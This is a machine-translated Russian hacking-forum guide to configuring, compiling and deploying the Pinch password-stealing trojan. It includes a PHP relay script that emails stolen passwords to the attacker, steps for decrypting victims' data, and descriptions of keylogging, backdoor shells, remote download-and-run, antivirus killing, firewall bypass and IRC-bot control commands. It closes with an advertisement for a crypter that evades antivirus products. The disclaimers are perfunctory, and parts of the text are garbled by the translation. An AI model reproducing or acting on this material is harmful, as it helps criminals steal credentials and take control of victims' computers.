This page has been robot translated, sorry for typos if any. Original content here.

Breaking soap, using BrutusAET2


MATERIAL IS POSITIONED FOR SIGNIFICANT PURPOSES. THE AUTHOR SHALL NOT BE RESPONSIBILITY


-------------------------------------------------- ----------------
part 1. old, but useful. for pinch 1

************************
Pinch Instruction 1.0
************************

=====
Intro
=====

Please do not be surprised that I decided to write a similar article (article for lamerzzz). The fact is that on my forum (http://forum.web-hack.ru) about three times a day a topic is created, like "How to configure and use Pinch correctly?", "How to use Pinch?" etc.

============
Opportunities
============

This trojan was quite widespread in 2003/2004. All thanks to the ability to steal a large number of passwords (ICQ99b-2003a / Lite / ICQ2003Pro, Miranda IM, Trillian ICQ & AIM, & RQ, The Bat !, The Bat! 2, Outlook / Outlook Express, IE autocomplete & protected sites & ftp (9x / ME / 2000 / XP), FAR Manager (ftp), Win / Total Commander (ftp), RAS (9x / Me / 2k / xp supported)), low weight, open source and ease of creating a troj for a specific task. The trojan has the following features:

- Send victim computer configuration: OS, operating system, CPU, HDD, logged user, host name, IP
- Keyboard spy (Key-log)
- Remote console
- Firewall bypass
- Sending all passwords to E-mail using an SMTP server
- Encryption of stolen mail passwords
- Auto delete trojan after launch
- HTML / Text reports
- File size approximately 10Kb
- Modular system
- And much more...

The trojan was written by coban2k (http://www.cobans.net), a fairly well-known person in the world of ICQ hacking. Due to hosting problems regarding the storage of the Trojan on their server, the author was forced to remove this creation from his site. Unfortunately, almost all antiviruses already find this trojan and can only be paired with a victim who does not have an antivirus.

=============
Equipment
=============

The following folders and files are included in the archive (pinch_1.0.zip) with a trojan:

\ PinchBuilder.exe - wizard for creating a trojan
\ Parser.exe - a program for decrypting encoded emails with passwords
\ readme.txt - no comment
\ Pinch \ - the main folder with the asm source code of the trojan and the compiler
\ Sources \ - other sources
\ TB! 2 Plugin (Auto-parser) \ - the folder with the plugin for The Bat 2 !, which decodes encrypted messages with passwords arriving in your mailbox
\ Sources \ Script \ - PHP-script through which passwords are sent when choosing the appropriate option during compilation (read on)

=================
We compile three
=================

The kit comes with a special wizard (PinchBuilder.exe), which creates a trojan according to your requirements and compiles the trojan directly on your computer. The program has two main tabs: Compile and Decrypt. The first serves to create a trojan, and the second to decrypt passwords (in fact, this tab is the result of the Parser.exe file). Three sub-tabs follow: SMTP, HTTP, and FILE. They specify the option to display passwords. Let's analyze each in more detail:

========
SMTP
========

In the Server field, enter the address (hostname / ip) of the SMTP server. If you entered the server domain, then click Resolve so that the server domain takes the form of an IP address. Next, in the From and To fields, indicate your soap. The Send test massage button is used for test sending letters through the settings specified by you. I strongly recommend using it. If the letter does not arrive, it means that there are some problems with sending (the firewall turned on, bad SMTP, did not click Resolve, etc.).

I want to note that recently, most providers are switching to a system by which their customers can send letters ONLY from their SMTP server. In such cases, I recommend using the method of sending letters via HTTP.

====
HTTP
====

We upload the file \ Sources \ Script \ view.php to a server supporting PHP scripts and executing the mail () function. Next, in the URL field, specify the path to this script (for example, http://www.xss.ru/pinch.php). In the Subject field, specify the name of the topic with which letters will be sent. The Status check str field should contain a line that is issued by the script after loading it. In the script that comes with the three, it matters: _ret_ok_1:

<script language = "JavaScript">
window.status = "_ ret_ok_1";
</script>

If this value is not accepted by the trojan, then it will try to send an email through this script every minute until it receives a line from the Status check str field in response. I recommend that you use the script not from the standard package, but written by me:

<html> <body>
<? php
// Author: Terabyte (http://www.web-hack.ru)
$ email = $ _ POST ['a'];
$ subject = $ _ POST ['b'];
$ msg = $ _ POST ['c'];
if (isset ($ email) and isset ($ subject) and isset ($ msg)) {
mail ($ email, $ subject, $ msg, "From: $ email");}
?>
<script language = "JavaScript">
window.status = "_ ret_ok_1";
</script>
</body> </html>

He does almost the same thing, but is more correctly written. A huge plus when using this method of sending passwords is the fact that it allows you to send passwords bypassing Firewall. How is this achieved? Here is a clipping from the outpost log at the time of sending the password through a script from my site:

Process Name: iexplorer.exe
Protocol: HTTP
Remote address: www.web-hack.ru

I think everyone understood who is not in the tank =) Also, from the pros, I can highlight the ability to write encrypted letters on your site, rather than send to soap; the ability to change the soap to which passwords are sent, in case it is deleted; during mass distribution of trojs (so that passwords can be sent even from those providers where access to all SMTP servers is disabled, except for them)

====
FILE
====

On this tab, the path to the file to which all passwords are saved is set. To do this, in the Path field, write the path to the file (for example, C: \ password.txt).

=================
Compiler options
=================

Everything is clear in this area, here you just need to check the boxes where you need it. It is worth paying attention to the Add Icon field. It indicates the path to the icon with which the compiled trojan will be displayed. I want to note that on my system (Windows XP), I still could not compile the trojs with this option enabled and had to be disabled.

In the Protocol fields, specify the method by which passwords will be sent (SMTP / HTTP / FILE). Next, click the Compile button and the compilation of the trojan should go, which will be saved in the main folder with the wizard to create it.

====================
Password decryption
====================

Let’s say you managed to get this three to the lamer and you got the passwords from the victim’s car. The fact is that when sending the passwords are encrypted and they must first be decrypted (if you do not have a special plug-in for TheBat! Described above). Copy the text with the encoded passwords to the clipboard, open Parser.exe (or the Decrypt tab in PinchBuilder.exe) and click on the Process Data item in the context menu (or just press the key combination Alt + C). Next, the program will give you all the data stolen from the victim in a convenient form. Then you can save or print them.

===========
Conclusion
===========

I want to warn you that when using this trojan you immediately fall under article 273 of the Criminal Code of the Russian Federation and can be seriously punished ;-) I (the author of the article) do not bear any responsibility for the harm that may be caused to any person after reading my article.


----------------------------------------

Part 2. Pinch instruction 2.58

A short article on elementary pinch tuning. Do not judge strictly, but criticize with all your mouth. Pinch 2.58 customization article.

I think that there is no problem with the crack, as there is a detailed help and even a video is attached. I want to show how to set up a three in the Builder:

SMTP Properties
Server (enter, in your case smtp.mail.ru), then you must click Resolve to convert it to IP (by the way. All frauds must be carried out with the Internet connected)

Port - leave as it is

Protocol - the choice of how the report will be obtained, via SMTP, HTTP (via php) and FILE - stored on the computer. Buttons of the same name (SMTP, HTTP, FILE) are protocol settings, but in this case we are interested in SMTP and we have already configured it ..

Button TestSend send a test message to mail.

PWD tab - pass passwords from the listed programs. The ENABLE PWD item when unchecking reports will not contain passwords.
Jackdaw Don't send old report - do not send old reports.
Jackdaws Encrypt and Packing are interconnected. FSG, UPX, MEW choice of packaging method.

RUN tab - selection of startup methods. I think you will understand it. Build as .... standart, DLL, Undelate Service. Move to a folder ..... either you specify or select one of the system ones. To the right is the Values ​​column, I didn’t touch it and honestly vaguely imagine why it is. Bottom right - bypass Windows Firewall (SP2) - bypass the system firewall in SP2 (as far as I know the mechanism of this item is that it starts like iexplorer.exe)

SPY tab - some additional reports - it didn’t work for me. Screen spy fad - taking a screenshot, but again it didn’t work for me (srkin was sent, but it was empty)

NET tab - I did not use it. It is designed to:
1. Open any port on the infected computer, and accordingly get access to it (I strongly advise you not to use it, if you do not encrypt it, if you get caught, you yourself guess what will happen ...)
2. Downloader - indicating a direct link to any file that should be downloaded and launched (estimate what expenses your enemy will incur if he has traffic ......))))
3. AutoUpdate - auto-update - the troy, upon completion of work, downloads its copy, and then self-deletes the next time the system boots up, a new copy is already launched (this is for the sake of reliability so that it would not be found.

BD tab (backdoor) - the console opens a shell on the selected port, control via telnet (telnet.exe) or alternative programs. (I have not tried it myself)

The ECT tab - gluing with some file, as well as setting the icon ... You can also do this so that a message pops up ... But something does not work ...

KILL tab - killing of any process (you can also try to kill the antivirus), for example, "spidernt" - and then the DrWEB monitor will turn off (I warn you, I haven’t done it yet, but I will try)

IE tab - installation of your start page on the browser. Adding a page to Favorites ....

WORM tab - sho tse take, I don’t know ... .....

IRC-bot tab - access to a computer through IRC:
.login authorization
.die - bot shutdown
.download - download a file from url
.httpd - open access to the file via http on a specific port
.killthread - completion of a specific task
.proxy - opening sox4 with on the selected port with the selected id
.raw - sending raw text to this irc server
.remove - self-removal
.restart - restart
.run - run commands
.scan - scan IP addresses for specific open ports
.shell - opening a shell on a specific port (not in 95/98 / ME)
.status - show version, IP, launch date
.threads - show active tasks
.update - bot self-update from a special url
.visit - visit selected URL hidden
.url - visit selected URL openly
.link - add to favorits
.sp - make starting
.msg - message (messagebox)

That’s like it’s all .... You press COMPILE and three appear in your build folder ...

GOOD LUCK !!!!!

PS This, like, everything is written for review and the author does not bear any responsibility for the consequences ...



~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Crypt features:
Polymer Cryptor Used
KIS bypass and Outpost (including latest versions)
Self removal
Size reduction (Normal pinch is reduced by 3-6kb, zupacha loader by 60-80kb)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~